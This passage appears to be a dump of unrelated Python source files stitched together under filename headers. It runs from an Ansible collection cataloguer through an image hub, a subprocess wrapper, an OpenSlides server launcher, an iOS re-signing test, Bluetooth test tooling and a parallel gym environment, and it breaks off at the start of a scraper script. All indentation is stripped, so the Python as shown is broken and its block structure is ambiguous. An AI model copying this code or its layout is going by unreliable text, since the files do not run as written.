collection = None
if os.path.exists(manifest_file):
with open(file=manifest_file, encoding="utf-8") as read_file:
try:
collection = json.load(read_file)
collection["meta_source"] = "MANIFEST.json"
except JSONDecodeError:
error = {
"path": os.path.dirname(manifest_file),
"error": "failed to load MANIFEST.json",
}
self._errors.append(error)
elif os.path.exists(galaxy_file):
with open(file=galaxy_file, encoding="utf-8") as read_file:
try:
collection = {"collection_info": yaml.load(read_file, Loader=SafeLoader)}
collection["meta_source"] = "galaxy.yml"
except YAMLError:
error = {
"path": os.path.dirname(galaxy_file),
"error": "failed to load galaxy.yml",
}
self._errors.append(error)
if collection:
cname = f"{collection['collection_info']['namespace']}"
cname += f".{collection['collection_info']['name']}"
collection["known_as"] = cname
collection["plugins"] = []
collection["plugin_chksums"] = {}
collection["path"] = directory_path
runtime_file = f"{directory_path}/meta/runtime.yml"
collection["runtime"] = {}
if os.path.exists(runtime_file):
with open(file=runtime_file, encoding="utf-8") as read_file:
try:
collection["runtime"] = yaml.load(read_file, Loader=SafeLoader)
except YAMLError as exc:
self._errors.append({"path": runtime_file, "error": str(exc)})
self._collections[collection["path"]] = collection
else:
msg = (
f"collection path '{directory_path}' is ignored as it does not"
" have 'MANIFEST.json' and/or 'galaxy.yml' file(s)."
)
self._messages.append(msg)
def _find_shadows(self) -> None:
"""for each collection, determine which other collections are hiding it"""
collection_list = list(self._collections.values())
counts = Counter([collection["known_as"] for collection in collection_list])
for idx, (cpath, o_collection) in reversed(list(enumerate(self._collections.items()))):
self._collections[cpath]["hidden_by"] = []
if counts[o_collection["known_as"]] > 1:
for i_collection in reversed(collection_list[0:idx]):
if i_collection["known_as"] == o_collection["known_as"]:
self._collections[cpath]["hidden_by"].insert(0, i_collection["path"])
def process_directories(self) -> Tuple[Dict, List]:
"""process each parent directory"""
for directory in self._directories:
collection_directory = f"{directory}/ansible_collections"
if os.path.exists(collection_directory):
self._one_path(collection_directory)
for _cpath, collection in self._collections.items():
self._catalog_plugins(collection)
self._find_shadows()
return self._collections, self._errors
def worker(pending_queue: multiprocessing.Queue, completed_queue: multiprocessing.Queue) -> None:
"""extract a doc from a plugin, place in completed q"""
# pylint: disable=import-outside-toplevel
# load the fragment_loader _after_ the path is set
from ansible.plugins.loader import fragment_loader # type: ignore
while True:
entry = pending_queue.get()
if entry is None:
break
collection_name, chksum, plugin_path = entry
try:
(doc, examples, returndocs, metadata) = get_docstring(
filename=plugin_path,
fragment_loader=fragment_loader,
collection_name=collection_name,
)
except Exception as exc: # pylint: disable=broad-except
err_message = f"{type(exc).__name__} (get_docstring): {str(exc)}"
completed_queue.put(("error", (chksum, plugin_path, err_message)))
continue
try:
q_message = {
"plugin": {
"doc": doc,
"examples": examples,
"returndocs": returndocs,
"metadata": metadata,
},
"timestamp": datetime.utcnow().isoformat(),
}
completed_queue.put(("plugin", (chksum, json.dumps(q_message, default=str))))
except JSONDecodeError as exc:
err_message = f"{type(exc).__name__} (json_decode_doc): {str(exc)}"
completed_queue.put(("error", (chksum, plugin_path, err_message)))
def identify_missing(collections: Dict, collection_cache: KeyValueStore) -> Tuple[set, List, int]:
"""identify plugins missing from the cache"""
handled = set()
missing = []
plugin_count = 0
for _cpath, collection in collections.items():
for chksum, details in collection["plugin_chksums"].items():
plugin_count += 1
if chksum not in handled:
if chksum not in collection_cache:
missing.append(
(collection["known_as"], chksum, f"{collection['path']}{details['path']}"),
)
handled.add(chksum)
return handled, missing, plugin_count
def parse_args():
"""parse the cli args"""
parser = argparse.ArgumentParser(description="Catalog collections.")
parser.add_argument(
"-d",
dest="dirs",
nargs="+",
help="search within the specified directories",
default=current_collection_paths,
)
parser.add_argument("-a", dest="adjacent", help="prepended to dirs")
parser.add_argument(
"-c",
dest="collection_cache_path",
help="path to collection cache",
required=True,
)
parsed_args = parser.parse_args()
adjacent = vars(parsed_args).get("adjacent")
if adjacent:
directories = [adjacent] + parsed_args.dirs
else:
directories = parsed_args.dirs
directories.extend(reversed(sys.path))
resolved = []
for directory in directories:
realpath = os.path.realpath(directory)
if realpath not in resolved:
resolved.append(realpath)
return parsed_args, resolved
def retrieve_collections_paths() -> Dict:
"""retrieve the currently set collection paths"""
cmd = ["ansible-config", "dump", "|", "grep", "COLLECTIONS_PATHS"]
proc_out = run_command(cmd)
if "error" in proc_out:
return proc_out
regex = re.compile(r"^(?P<variable>\S+)\((?P<source>.*)\)\s=\s(?P<current>.*)$")
parsed = regex.match(proc_out["stdout"])
if parsed:
try:
current = yaml.load(parsed.groupdict()["current"], Loader=SafeLoader)
return {"result": current}
except (YAMLError, KeyError) as exc:
return {"error": str(exc)}
return {"error": f"corrupt current collection path: {proc_out['stdout']}"}
def retrieve_docs(
collection_cache: KeyValueStore,
errors: List,
missing: List,
stats: Dict,
) -> None:
# pylint: disable=too-many-locals
"""extract the docs from the plugins"""
pending_queue = multiprocessing.Manager().Queue()
completed_queue = multiprocessing.Manager().Queue()
processes = []
for _proc in range(PROCESSES):
proc = multiprocessing.Process(target=worker, args=(pending_queue, completed_queue))
processes.append(proc)
proc.start()
for entry in missing:
pending_queue.put(entry)
for _proc in range(PROCESSES):
pending_queue.put(None)
for proc in processes:
proc.join()
while not completed_queue.empty():
message_type, message = completed_queue.get()
if message_type == "plugin":
chksum, plugin = message
collection_cache[chksum] = plugin
stats["cache_added_success"] += 1
elif message_type == "error":
chksum, plugin_path, error = message
collection_cache[chksum] = json.dumps({"error": error})
errors.append({"path": plugin_path, "error": error})
stats["cache_added_errors"] += 1
def run_command(cmd: List) -> Dict:
"""run a command"""
try:
proc_out = subprocess.run(
" ".join(cmd),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
shell=True,
)
return {"stdout": proc_out.stdout}
except subprocess.CalledProcessError as exc:
return {"error": str(exc)}
def main() -> Dict:
# pylint: disable=protected-access
"""main"""
stats = {}
stats["cache_added_success"] = 0
stats["cache_added_errors"] = 0
cc_obj = CollectionCatalog(directories=parent_directories)
collections, errors = cc_obj.process_directories()
stats["collection_count"] = len(collections)
collection_cache_path = os.path.abspath(os.path.expanduser(args.collection_cache_path))
collection_cache = KeyValueStore(collection_cache_path)
handled, missing, plugin_count = identify_missing(collections, collection_cache)
stats["plugin_count"] = plugin_count
stats["unique plugins"] = len(handled)
stats["processed"] = len(missing)
if missing:
retrieve_docs(collection_cache, errors, missing, stats)
cached_chksums = collection_cache.keys()
stats["cache_length"] = len(collection_cache.keys())
for _cpath, collection in collections.items():
for no_doc in set(collection["plugin_chksums"].keys()) - set(cached_chksums):
del collection["plugin_chksums"][no_doc]
collection_cache.close()
return {
"collections": collections,
"errors": errors,
"stats": stats,
"messages": cc_obj._messages,
}
if __name__ == "__main__":
start_time = datetime.now()
collection_paths = retrieve_collections_paths()
if "error" in collection_paths:
sys.exit(collection_paths["error"])
else:
current_collection_paths = collection_paths["result"]
args, parent_directories = parse_args()
COLLECTION_SCAN_PATHS = ":".join(parent_directories)
os.environ["ANSIBLE_COLLECTIONS_PATHS"] = COLLECTION_SCAN_PATHS
result = main()
result["stats"]["duration"] = (datetime.now() - start_time).total_seconds()
result["collection_scan_paths"] = COLLECTION_SCAN_PATHS
print(json.dumps(result, default=str))
|
hub.py | """hub.py -- ImagHub and Settings classes
Copyright (c) 2018 by Jeff Bass.
License: MIT, see LICENSE for more details.
"""
import os
import sys
import yaml
import pprint
import signal
import logging
import itertools
import threading
from time import sleep
from ast import literal_eval
from datetime import datetime
from collections import deque
import numpy as np
import cv2
import imutils
from imutils.video import VideoStream
sys.path.insert(0, '../../imagezmq/imagezmq') # for testing
import imagezmq
from tools.utils import interval_timer
from tools.hubhealth import HealthMonitor
class ImageHub:
""" Contains the attributes and methods of an imagehub
One ImageHub is instantiated during the startup of the imagehub.py
program. It takes the settings loaded from the YAML file and sets all
the operational parameters of the imagehub, including the hub address and
port to receive messages, directories to store images and logs, etc.
The ImageHub has methods to write events from inbound message queue
to the event log and to write inbound image files to image directories.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# Check that numpy and OpenCV are OK; will get traceback error if not
self.tiny_image = np.zeros((3,3), dtype="uint8") # tiny blank image
ret_code, jpg_buffer = cv2.imencode(
".jpg", self.tiny_image, [int(cv2.IMWRITE_JPEG_QUALITY), 95])
self.tiny_jpg = jpg_buffer # matching tiny blank jpeg
# image queue of (node_and_view, image, type) to write to image directory
self.image_q = deque(maxlen=settings.queuemax)
# start system health monitoring & get system type (RPi vs Mac etc)
self.health = HealthMonitor(settings)
self.patience = settings.patience * 60 # convert to seconds
self.userdir = settings.userdir
# open ZMQ hub using imagezmq
self.image_hub = imagezmq.ImageHub()
self.receive_next = self.image_hub.recv_jpg # assume receiving jpg
self.send_reply = self.image_hub.send_reply
# check that data and log directories exist; create them if not
# see docs for data directory structure including logs and images
self.data_directory = self.build_dir(settings.data_directory)
log_directory = os.path.join(self.data_directory, 'logs')
self.log_directory = self.build_dir(log_directory)
self.logfile = os.path.join(self.log_directory, 'imagehub.log')
images_directory = os.path.join(self.data_directory, 'images')
self.images_directory = self.build_dir(images_directory)
self.log = None
self.max_images_write = settings.max_images_write
self.image_count = 0 # count of images written in current directory
self.first_time_over_max = True # is this the first time max exceeded?
self.image_writing_thread = threading.Thread(daemon=True,
target=self.image_writer)
self.keep_writing = True
self.image_writing_thread.start()
def build_dir(self, directory):
"""Build full directory name from settings directory from yaml file
"""
full_directory = os.path.join(self.userdir, directory)
try:
os.mkdir(full_directory)
self.image_count = 0 # Each new image directory gets a new 0 count
self.first_time_over_max = True # if exceeded, this is first time
except FileExistsError:
pass
return full_directory
def process(self, text, image, settings):
''' process one incoming node message
Every node message has a text part and an image part
There are 2 formats for the node message text part:
Event message: nodename viewname | event_type | optional added info
Image message: nodename viewname | image_type
(where image_type is either 'jpg' or 'image')
See docs/imagehub-details.rst for more about message formats
'''
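# Illustrative message texts (node and view names are hypothetical) matching the two formats above:
#   'barn-cam driveway|motion|moving'   -> event message: written to the event log
#   'barn-cam driveway|jpg'             -> image message: the jpg is queued for writing to disk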
message = text.split("|")
if len(message) < 2: # a "send_test_image" that should not be saved
return b'OK'
type = message[1] # type is the second delimited field in text
t0 = type[0] # the first character of type is unique & compares faster
if t0 == 'H': # Heartbeat message; return before testing anything else
return b'OK'
node_and_view = message[0].strip().replace(' ', '-')
# datetime.now().isoformat() looks like '2013-11-18T08:18:31.809000'
timestamp = datetime.now().isoformat().replace(':', '.')
image_filename = node_and_view + '-' + timestamp
if t0 == "i": # image
pass # ignore image type; only saving jpg images for now
elif t0 == 'j': # jpg; append to image_q
self.image_q.append((image_filename, image, t0,))
# writing image files from image_q is normally done in a thread
# but for unthreaded testing, uncomment below to write every image
# self.write_one_image()
else:
log_text = text # may strip spaces later?
self.log.info(log_text)
return b'OK'
def image_writer(self):
# writes all the images in the image_q
# run as a separate thread, started in the class constructor
while self.keep_writing:
if len(self.image_q) > 0:
self.write_one_image()
else:
sleep(0.0000001) # sleep before checking image_q again
def write_one_image(self):
# when actually writing images, need to stop if too many have been
# written, to prevent disk fillup; need to set limits in imagehub.yaml
filename, image, type = self.image_q.popleft()
date = filename[-26:-16]  # slice the YYYY-MM-DD date out of the isoformat timestamp at the end of the filename
date_directory = os.path.join(self.images_directory, date)
date_directory = self.build_dir(date_directory)
self.image_count += 1
if self.image_count > self.max_images_write:
if self.first_time_over_max:
self.log.warning('Max images written. Writing stopped.')
self.first_time_over_max = False
return # This directory has hit its maximum number of images
full_file_name = os.path.join(date_directory, filename) + ".jpg"
# write the image file to disk using full_file_name
with open(full_file_name,"wb") as f:
f.write(image)
def handle_timeout(self):
timestamp = datetime.now().isoformat().replace(':', '.')
message = 'No messages received for ' + str(
self.patience // 60) + ' minutes.'
self.log.info(message)
pass
def closeall(self):
""" Close all resources & write any images remaining in image_q.
"""
# write any images left in queue to files
self.keep_writing = False # signals the image writing thread to stop
# wait for 1 second, then write any images left in the image_q
sleep(1)
while len(self.image_q) > 0:
self.write_one_image()
pass
class Settings:
"""Load settings from YAML file
Note that there is currently almost NO error checking for the YAML
settings file. Therefore, by design, an exception will be raised
when a required setting is missing or misspelled in the YAML file.
This stops the program with a Traceback which will indicate which
setting below caused the error. Reading the Traceback will indicate
which line below caused the error. Fix the YAML file and rerun the
program until the YAML settings file is read correctly.
There is a "print_settings" option that can be set to TRUE to print
the dictionary that results from reading the YAML file. Note that the
order of the items in the dictionary will not necessarily be the order
of the items in the YAML file (this is a property of Python dictionaries).
"""
def __init__(self):
userdir = os.path.expanduser("~")
self.userdir = userdir
with open(os.path.join(userdir,"imagehub.yaml")) as f:
self.config = yaml.safe_load(f)
self.print_hub = False
if 'hub' in self.config:
if 'print_settings' in self.config['hub']:
if self.config['hub']['print_settings']:
self.print_settings()
self.print_hub = True
else:
self.print_hub = False
else:
self.print_settings('"hub" is a required settings section but not present.')
raise KeyboardInterrupt
if 'patience' in self.config['hub']:
self.patience = self.config['hub']['patience']
else:
self.patience = 10 # default is to wait 10 minutes for imagenodes
if 'queuemax' in self.config['hub']:
self.queuemax = self.config['hub']['queuemax']
else:
self.queuemax = 500
if 'data_directory' in self.config['hub']:
self.data_directory = self.config['hub']['data_directory']
else:
self.data_directory = 'imagehub_data'
if 'max_images_write' in self.config['hub']:
self.max_images_write = self.config['hub']['max_images_write']
else:
self.max_images_write = 5000
def print_settings(self, title=None):
""" prints the settings in the yaml file using pprint()
"""
if title:
print(title)
print('Contents of imagehub.yaml:')
pprint.pprint(self.config)
print()
|
script.py | """
All Work with linux scripting
"""
__author__ = ('Reza Zeiny <rezazeiny1998@gmail.com>',)
import logging
import random
import string
import subprocess
from threading import Thread
logger = logging.getLogger(__name__)
PIPE = -1
STDOUT = -2
DEVNULL = -3
def id_generator(size: int = 6, chars: str = string.ascii_uppercase + string.ascii_lowercase + string.digits) -> str:
"""
Generate random string
Args:
size (int): size of random string
chars (str): set of characters to choose from
Returns:
(str) : random string
"""
return ''.join(random.choice(chars) for _ in range(size))
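# Usage sketch: id_generator(8) returns something like 'aZ3kQ9xP' (the value shown is
# illustrative only; the actual string is random).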
class ShellScript:
"""
Shell Script
"""
def __init__(self, args, *, timeout=None, background=False, quiet=False, extra_data=None):
self.__used = False
self.command = args
self.is_running = False
self.process_id = None
self.exit_code = None
self.stdout = None
self.stderr = None
self.error = None
self.timeout = timeout
self.background = background
self.quiet = quiet
self.extra_data = extra_data
def _log(self, level, message, data=None):
if data is None:
data = {}
if logger.isEnabledFor(level):
# noinspection PyProtectedMember
logger._log(level, f"run {self.command}: {message}", (data,))
def _run_job(self):
self.is_running = True
self._log(logging.DEBUG, "Start")
if self.quiet:
stderr = DEVNULL
stdout = DEVNULL
else:
stdout = PIPE
stderr = PIPE
try:
process = subprocess.Popen(self.command, stdout=stdout, stderr=stderr)
self.process_id = process.pid
self._on_start()
try:
stdout, stderr = process.communicate(timeout=self.timeout)
except Exception as e:
process.kill()
raise e
if stdout is not None:
if type(stdout) == bytes:
self.stdout = stdout.decode().split("\n")[:-1]
else:
self.stdout = []
if stderr is not None:
if type(stderr) == bytes:
self.stderr = stderr.decode().split("\n")[:-1]
else:
self.stderr = []
self.exit_code = process.poll()
self.is_running = False
if self.exit_code == 0:
self._log(logging.DEBUG, "Completed")
self._on_success()
else:
self._log(logging.DEBUG, f"Error Code {self.exit_code}")
self._on_error()
except Exception as e:
self.is_running = False
self.error = e
self._log(logging.DEBUG, f"Exception {e}")
self._on_exception()
return self
def _on_start(self):
"""
If command is starting
"""
pass
def _on_error(self):
"""
If exit code of running command is not zero call this function
"""
pass
def _on_success(self):
"""
If exit code of running command is zero call this function
"""
pass
def _on_exception(self):
"""
If acquire any exception while running command call this function
"""
pass
def run(self):
"""
Run Script
"""
if self.__used:
raise Exception("this command was run before. make a new instance")
self.__used = True
if self.background:
job = Thread(target=self._run_job)
job.start()
while self.process_id is None and self.error is None:
pass
else:
self._run_job()
return self
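# Usage sketch (command and timeout are illustrative): run a command in the foreground and
# inspect its captured output and exit code afterwards.
# script = ShellScript(['ls', '-l'], timeout=5).run()
# if script.exit_code == 0:
#     print(script.stdout)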
|
main.py | import logging
import multiprocessing
import os
import signal
import sys
import time
from typing import Any
from datastore.reader.app import register_services
from gunicorn.app.base import BaseApplication
from migrations import assert_migration_index as assert_migration_index
from .shared.env import is_dev_mode
from .shared.interfaces.logging import LoggingModule
from .shared.interfaces.wsgi import WSGIApplication
register_services()
# ATTENTION: We use the Python builtin logging module. To change this use
# something like "import custom_logging as logging".
DEFAULT_ADDRESSES = {
"ActionView": "0.0.0.0:9002",
"PresenterView": "0.0.0.0:9003",
}
class OpenSlidesBackendGunicornApplication(BaseApplication): # pragma: no cover
"""
Standalone application class for Gunicorn. It prepares Gunicorn for using
OpenSlidesBackendWSGIApplication via OpenSlidesBackendWSGIContainer either
with action component or with presenter component.
"""
def __init__(self, view_name: str, *args: Any, **kwargs: Any) -> None:
# Setup global loglevel.
if is_dev_mode():
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
self.view_name = view_name
if self.view_name not in ("ActionView", "PresenterView"):
raise ValueError(
f"View name has to be ActionView or PresenterView, not {self.view_name}."
)
logger.debug(f"Create gunicorn application for {self.view_name}.")
assert_migration_index()
super().__init__(*args, **kwargs)
def load_config(self) -> None:
loglevel = "debug" if is_dev_mode() else "info"
options = {
"bind": DEFAULT_ADDRESSES[self.view_name],
"worker_tmp_dir": "/dev/shm", # See https://pythonspeed.com/articles/gunicorn-in-docker/
"timeout": int(os.environ.get("OPENSLIDES_BACKEND_WORKER_TIMEOUT", "30")),
"loglevel": loglevel,
"reload": loglevel == "debug",
"reload_engine": "auto", # This is the default however.
}
for key, value in options.items():
self.cfg.set(key, value)
def load(self) -> WSGIApplication:
# We import this here so Gunicorn can use its reload feature properly.
from .wsgi import create_wsgi_application
# TODO: Fix this typing problem.
logging_module: LoggingModule = logging # type: ignore
return create_wsgi_application(logging_module, self.view_name)
def start_action_server() -> None: # pragma: no cover
OpenSlidesBackendGunicornApplication(view_name="ActionView").run()
def start_presenter_server() -> None: # pragma: no cover
OpenSlidesBackendGunicornApplication(view_name="PresenterView").run()
def start_them_all() -> None: # pragma: no cover
print(
f"Start all components in child processes. Parent process id is {os.getpid()}."
)
processes = {
"action": multiprocessing.Process(target=start_action_server),
"presenter": multiprocessing.Process(target=start_presenter_server),
}
for process in processes.values():
process.start()
def sigterm_handler(signalnum: int, current_stack_frame: Any) -> None:
strsignal = signal.strsignal # type: ignore
print(
f"Parent process {os.getpid()} received {strsignal(signalnum)} "
"signal. Terminate all child processes first."
)
for child in multiprocessing.active_children():
child.terminate()
child.join()
print(f"Parent process {os.getpid()} terminated successfully.")
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
signal.signal(signal.SIGINT, sigterm_handler)
while True:
for name, process in processes.items():
if not process.is_alive():
process.join()
print(
f"Component {name} terminated. Terminate all other components now."
)
for other_name, other_process in processes.items():
if name != other_name:
other_process.terminate()
other_process.join()
print("Parent process terminated.")
sys.exit(1)
time.sleep(0.1)
def main() -> None: # pragma: no cover
component = os.environ.get("OPENSLIDES_BACKEND_COMPONENT", "all")
if component == "action":
start_action_server()
elif component == "presenter":
start_presenter_server()
elif component == "all":
start_them_all()
else:
print(
f"Error: OPENSLIDES_BACKEND_COMPONENT must not be {component}.",
file=sys.stderr,
)
sys.stderr.flush()
sys.exit(1)
sys.exit(0)
|
test_remote_signer.py |
from isign import isign
from isign_base_test import IsignBaseTest
from multiprocessing import Process
from signing_service import SigningService
from signing_service_config import SigningServiceConfig
import time
from TestPythonLibDir.RemotePkcs1Signer import RemotePkcs1Signer
CONFIG = SigningServiceConfig()
class TestRemoteSigner(IsignBaseTest):
@staticmethod
def start_httpd():
signing_service = SigningService()
def start_signing_service():
signing_service.start(quiet=True)
httpd_process = Process(name='signing_service', target=start_signing_service)
httpd_process.daemon = True
httpd_process.start()
time.sleep(1)
return httpd_process
def test_remote_signer(self):
output_path = self.get_temp_file()
httpd_process = None
try:
httpd_process = self.start_httpd()
isign.resign(
IsignBaseTest.TEST_IPA_XCODE7,
certificate=IsignBaseTest.CERTIFICATE,
provisioning_profiles=[IsignBaseTest.PROVISIONING_PROFILE],
output_path=output_path,
signer_class=RemotePkcs1Signer,
signer_arguments={
'host': CONFIG.host,
'port': CONFIG.port,
'key': CONFIG.cert_hash_to_key_file.keys()[0]
}
)
# test the output path for correctness
finally:
if httpd_process is not None:
httpd_process.terminate()
|
tooling.py | # TODO: add support for external tools: btmon, serial port output,
# file management with result sorting
import subprocess
import threading
import serial
import os
import time
import logging
import signal
from queue import Queue
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
from pathlib import Path
from coap_config import *
def get_tty_path(name):
"""Returns tty path (eg. /dev/ttyUSB0) of serial device with specified name
:param name: device name
:return: tty path if device found, otherwise None
"""
serial_devices = {}
ls = subprocess.Popen(["ls", "-l", "/dev/serial/by-id"],
stdout=subprocess.PIPE)
awk = subprocess.Popen("awk '{if (NF > 5) print $(NF-2), $NF}'",
stdin=ls.stdout,
stdout=subprocess.PIPE,
shell=True)
end_of_pipe = awk.stdout
for line in end_of_pipe:
device, serial = line.decode().rstrip().split(" ")
serial_devices[device] = serial
for device, serial in list(serial_devices.items()):
if name in device:
tty = os.path.basename(serial)
return "/dev/{}".format(tty)
return None
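# Usage sketch (device name and resolved path are hypothetical): look up a serial device's tty
# path by the name shown under /dev/serial/by-id, e.g.
# get_tty_path('J-Link')  # -> '/dev/ttyACM0', or None if no matching device is connected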
class BTMonitor():
def __init__(self, conn='J-Link', bsp='nrf52', serial_num=None, mode='write', testcase=None):
self.conn = conn
self.mode = mode
self.bsp = bsp
self.serial_num = serial_num
self.testcase = testcase
self.bsp = bsp
self.process = None
self.end_read = False
def read_func_output(self, process, q):
while not self.end_read:
output = process.stdout.readline().decode()
if len(output) > 0:
logging.debug(output)
q.put(output)
if 'RTT opened' in output:
logging.debug(output)
break
return
def begin(self):
# stdbuf -o0 removes PIPE buffering: all data on PIPE is ready to be read just when it appears
cmd = ['stdbuf', '-o0', 'btmon'] + \
['-J' if self.conn == 'J-Link' else self.conn] + \
[str(self.bsp) + ','+ str(self.serial_num) if self.serial_num else str(self.bsp)] + \
['-w' if self.mode == 'write' else ''] + \
[str(self.testcase) + '.snoop' if self.testcase is not None else 'btmonlog.snoop']
logging.debug(' '.join(cmd))
self.process = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# Check if process is indeed running
if self.process.poll() is not None:
logging.error('Failed to run btmon')
while True:
q = Queue()
thread = threading.Thread(target=self.read_func_output, args=[self.process, q], )
thread.start()
thread.join(1)
if thread.is_alive():
logging.debug('End btmon output check')
self.end_read = True
while True:
output = q.get()
logging.debug('queue length: ' + str(q.qsize()))
logging.debug(output)
# empty btmon output signals failure on startup; return value can be used to detect it
if 'RTT opened' in output:
logging.debug('btmon connected')
return 0
# else:
elif 'Failed to open J-Link' in output:
logging.debug('J-Link failed')
return 1
if q.empty():
return 1
return 1
def close(self):
os.kill(self.process.pid, signal.SIGINT)
rc = self.process.wait()
logging.debug('btmon closed: ' + str(rc))
class RTT2PTY:
def __init__(self):
self.rtt2pty_process = None
self.pty_name = None
self.serial_thread = None
self.stop_thread = threading.Event()
self.log_filename = None
self.log_file = None
self.testcase = None
def _start_rtt2pty_proc(self):
self.rtt2pty_process = subprocess.Popen('rtt2pty',
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
flags = fcntl(self.rtt2pty_process.stdout, F_GETFL) # get current p.stdout flags
fcntl(self.rtt2pty_process.stdout, F_SETFL, flags | O_NONBLOCK)
time.sleep(3)
pty = None
try:
for line in iter(self.rtt2pty_process.stdout.readline, b''):
line = line.decode('UTF-8')
if line.startswith('PTY name is '):
pty = line[len('PTY name is '):].strip()
except IOError:
pass
return pty
def _read_from_port(self, ser, stop_thread, file):
current_test = None
while not stop_thread.is_set():
if self.testcase != current_test:
file.write('--- tc: #' + str(self.testcase) + '---\n')
current_test = self.testcase
data = ser.read(ser.in_waiting)
try:
decoded = data.decode()
except UnicodeDecodeError:
continue
file.write(decoded)
file.flush()
return 0
def start(self, log_filename):
self.log_filename = log_filename
self.pty_name = self._start_rtt2pty_proc()
self.ser = serial.Serial(self.pty_name, 115200, timeout=0)
self.stop_thread.clear()
self.log_file = open(self.log_filename, 'a')
self.serial_thread = threading.Thread(
target=self._read_from_port, args=(self.ser, self.stop_thread, self.log_file), daemon=True)
self.serial_thread.start()
def stop(self):
self.stop_thread.set()
if self.serial_thread:
self.serial_thread.join()
self.serial_thread = None
if self.log_file:
self.log_file.close()
self.log_file = None
if self.rtt2pty_process:
self.rtt2pty_process.send_signal(signal.SIGINT)
self.rtt2pty_process.wait()
self.rtt2pty_process = None
def rtt2pty_start(self):
if serial_read_enable:
name = 'iut-mynewt.log'
self.start(os.path.join(Path.cwd(), name))
def rtt2pty_stop(self):
if serial_read_enable:
self.stop()
class NewtMgr:
def __init__(self, profile_name: str, conn_type: str, connstring: str, testcase=None):
self.profile_name = profile_name
self.conn_type = conn_type
self.connstring = connstring
self.testcase = testcase
def make_profile(self):
"""
This method adds new connection profile or overwrites the old one, if it exists
"""
cmd = ['sudo', '-S', 'newtmgr', 'conn', 'add', self.profile_name,
'type=' + self.conn_type, 'connstring=' + self.connstring]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = process.communicate(input=pwd.encode())[0].decode()
logging.debug(output)
ctrl = 'Connection profile ' + self.profile_name + ' successfully added'
if ctrl in output:
logging.debug('Connection profile added')
else:
logging.debug('Failed to add connection profile ')
def check_corefile(self):
"""
Check if corefile exists; if board is not responding, restart it and check again
"""
cmd = ['sudo', '-S', 'newtmgr', 'image', 'corelist', '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate(input=pwd.encode())
output = stdout.decode()
errors = stderr.decode()
logging.debug(output)
# if process executed without errors, determine if corefile is present; print error otherwise
if errors == "":
if 'Corefile present' in output:
logging.debug('Board has crashed, corefile present')
self.download_and_delete_corefile()
elif 'No corefiles' in output:
logging.debug('No corefile; system didn\'t crash or corefile not present')
else:
logging.debug('Board crashed; restarting...')
# restart board
restart = subprocess.check_output(['nrfjprog', '-r']).decode()
logging.debug(restart)
# retry corefile check after restart
self.check_corefile()
else:
logging.error(errors)
def download_and_delete_corefile(self):
if self.testcase:
filename = self.testcase + '.coredump'
else:
filename = 'default.coredump'
cmd = ['sudo', 'newtmgr', 'image', 'coredownload', filename, '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = process.communicate(input=pwd.encode())[0].decode()
if 'Done writing core file' in output:
cmd = ['sudo', 'newtmgr', 'image', 'coreerase', '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.communicate(input=pwd.encode())[0].decode()
return 0
else:
logging.debug('Failed downloading corefile')
return 1
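# A minimal usage sketch, not part of the original harness: the profile name, connstring
# and test case id below are illustrative assumptions, and `pwd` (the sudo password) is
# expected to be defined at module level, as it is for the classes above.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    mgr = NewtMgr(profile_name='bttester', conn_type='serial',
                  connstring='dev=/dev/ttyACM0,baud=115200', testcase='GAP-TC-1')
    mgr.make_profile()
    mgr.check_corefile()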
|
penv.py | from multiprocessing import Process, Pipe
import gym
def worker(conn, env):
while True:
cmd, data = conn.recv()
if cmd == "step":
maxsteps = 100
obs, reward, done, info = env.step(data)
info['obs'] = obs
if done or env.step_count>=maxsteps:
obs = env.reset()
conn.send((obs, reward, done, info))
elif cmd == "reset":
obs = env.reset()
conn.send(obs)
else:
raise NotImplementedError
class ParallelEnv(gym.Env):
"""A concurrent execution of environments in multiple processes."""
def __init__(self, envs):
assert len(envs) >= 1, "No environment given."
self.envs = envs
self.observation_space = self.envs[0].observation_space
self.action_space = self.envs[0].action_space
self.locals = []
for env in self.envs[1:]:
local, remote = Pipe()
self.locals.append(local)
p = Process(target=worker, args=(remote, env))
p.daemon = True
p.start()
remote.close()
def reset(self):
for local in self.locals:
local.send(("reset", None))
results = [self.envs[0].reset()] + [local.recv() for local in self.locals]
return results
def step(self, actions):
maxsteps = 100
for local, action in zip(self.locals, actions[1:]):
local.send(("step", action))
obs, reward, done, info = self.envs[0].step(actions[0])
info['obs'] = obs
if done or self.envs[0].step_count>=maxsteps:
obs = self.envs[0].reset()
results = zip(*[(obs, reward, done, info)] + [local.recv() for local in self.locals])
return results
def render(self):
raise NotImplementedError |
runScrape.py | #!flask/bin/python
if __name__ == "__main__":
import logSetup
import logging
logSetup.initLogging()
# logSetup.initLogging(logging.WARNING)
	# Silence the extremely noisy psycopg2 warnings emitted on every exec.
import warnings
from sqlalchemy import exc as sa_exc
warnings.filterwarnings("ignore", category=UserWarning, module='psycopg2')
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
# This HAS to be included before the app, to prevent circular dependencies.
# import WebMirror.runtime_engines
import settings
import multiprocessing
import time
import json
import common.RunManager
import WebMirror.rules
import WebMirror.Runner
import WebMirror.UrlUpserter
import RawArchiver.RawRunner
import RawArchiver.RawUrlUpserter
import common.stuck
import common.process
import psutil
import Misc.ls_open_file_handles
import common.redis
import common.management.WebMirrorManage
from settings import NO_PROCESSES
from settings import RAW_NO_PROCESSES
from settings import MAX_DB_SESSIONS
import common.LogBase as LogBase
import common.StatsdMixin as StatsdMixin
class MemoryTracker(LogBase.LoggerMixin, StatsdMixin.InfluxDBMixin):
loggerPath = "Main.MemStats"
